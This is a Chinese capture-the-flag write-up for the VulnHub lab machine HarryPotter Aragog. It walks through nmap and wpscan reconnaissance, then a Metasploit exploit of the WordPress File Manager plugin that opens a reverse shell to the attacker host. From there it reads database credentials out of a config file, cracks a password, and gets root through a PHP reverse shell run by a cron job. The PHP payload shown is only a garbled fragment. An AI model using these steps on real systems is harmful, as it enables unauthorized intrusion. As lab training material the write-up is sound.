HarryPotter第一部—Aragog-1.0.2

Aragog 是 3 HarryPotter VM 系列中的第一个 VM,您需要在其中找到隐藏在机器内的 2 个魂器(哈利波特系列的 3 个 VM 中总共隐藏了 8 个魂器)并最终击败 Voldemort。

信息收集

nmap扫描

nmap -sC -sV 192.168.210.148
HarryPotter第一部—Aragog-1.0.2_第1张图片

IP地址靶机登录界面已经给出 根据扫描结果可得22ssh ,80http

网站信息收集

只有一张图片
HarryPotter第一部—Aragog-1.0.2_第2张图片

爆破一下网站目录

dirb http://192.168.210.148
HarryPotter第一部—Aragog-1.0.2_第3张图片

爆出来一个blog
HarryPotter第一部—Aragog-1.0.2_第4张图片

页面有点奇怪,点击页面都会错误,推测需要域名解析,去/etc/hosts中写一下域名解析
在这里插入图片描述

HarryPotter第一部—Aragog-1.0.2_第5张图片

哎,这就好了嘛
HarryPotter第一部—Aragog-1.0.2_第6张图片

既然cms为wordpress那么必须得用wpscan跑一跑
直接扫没扫出什么有效信息,版本没有问题那可能插件有漏洞(noitce中提示),尝试wpscan注册账号,带上 api-token 跑一跑

注册wpscan一个账号 https://wpvulndb.com/users/sign_up

wpscan --api-token=免费版的就行 --url=http://192.168.210.148/blog -e p --plugins-detection aggressive
HarryPotter第一部—Aragog-1.0.2_第7张图片

扫出3个问题,全是File Manager的漏洞
HarryPotter第一部—Aragog-1.0.2_第8张图片

漏洞利用

msf getshell

msf检索漏洞exp
HarryPotter第一部—Aragog-1.0.2_第9张图片

调试好参数

search wordpress File Manager
use 1
set rhosts wordpress.aragog.hogwarts
set targeturi /blog
set lhost 192.168.210.40
run

HarryPotter第一部—Aragog-1.0.2_第10张图片

HarryPotter第一部—Aragog-1.0.2_第11张图片

在/etc/wordpress/config-default.php 中发现了数据库的用户名密码
HarryPotter第一部—Aragog-1.0.2_第12张图片

python调bash
python3 -c 'import pty; pty.spawn("/bin/bash");'

登录mysql数据库

查询数据库信息
HarryPotter第一部—Aragog-1.0.2_第13张图片

HarryPotter第一部—Aragog-1.0.2_第14张图片

在这里插入图片描述

得到用户hagrid98 P P PBYdTic1NGSb8hJbpVEMiJaAiNJDHtc.
界面后可得 密码为password123
HarryPotter第一部—Aragog-1.0.2_第15张图片

ssh登录

成功拿到第一个魂器
HarryPotter第一部—Aragog-1.0.2_第16张图片

提权

在/opt下发现一个隐藏脚本,可以拷贝文件
HarryPotter第一部—Aragog-1.0.2_第17张图片

在tmp下创建php反弹shell马

&3 2>&3"); ?>

?>

HarryPotter第一部—Aragog-1.0.2_第18张图片

将脚本添加两行
HarryPotter第一部—Aragog-1.0.2_第19张图片

kali建通端口,等待不超过1分钟
成功获得root权限
HarryPotter第一部—Aragog-1.0.2_第20张图片

家目录下拿到第二个魂器
HarryPotter第一部—Aragog-1.0.2_第21张图片

能弹shell的原因是root有一个计划任务
HarryPotter第一部—Aragog-1.0.2_第22张图片

你可能感兴趣的:(vulnhub靶机通关,安全,ssh,web安全)